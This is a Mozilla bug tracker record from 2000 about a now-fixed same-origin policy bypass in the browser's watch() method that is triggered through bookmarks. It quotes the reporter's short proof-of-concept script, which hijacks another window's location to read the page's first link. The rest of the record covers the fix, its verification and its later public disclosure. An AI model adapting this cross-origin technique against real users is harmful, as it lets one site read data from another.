Closed Bug 28390 Opened 26 years ago Closed 26 years ago

watch() and bookmarks vulnerability

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows NT
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: norrisboyd, Assigned: norrisboyd)

References

(
URL
)

Details

Subject: BUG: watch() and bookmarks vulnerability Date: Fri, 18 Feb 2000 16:13:34 +0200 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> The watch() method when applied to window.location.href allows circumventing Same Origin security policy. But user interaction is required - selecting any bookmark from the menu of the target window. The code is: ------------------------------------------------- Select a bookmark from the menu of the other window. <SCRIPT> a=window.open("http://www.yahoo.com","victim"); a.location.watch("href",function (id,oldval,newval) { return "javascript:alert('The first link is:' +document.links[0].href)"; }); </SCRIPT> ------------------------------------------------- watch() vulnerability. Select a bookmark from the menu of the other window.
Group: netscapeconfidential?
Status: NEW → ASSIGNED
Target Milestone: M15
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Keywords: beta2
Moving to M16 so that M15 can branch.
Target Milestone: M15 → M16
Add test case.
URL: http://warp/u/norris/tests/mozilla/28...
Fix checked in.
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Norris - what is the expected behavior? What I see with Seamonkey is that when selecting a bookmark in the second window, nothing happens. With Nova, the bookmark selected is opened in the new window.
Keywords: nsbeta2
Verified.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.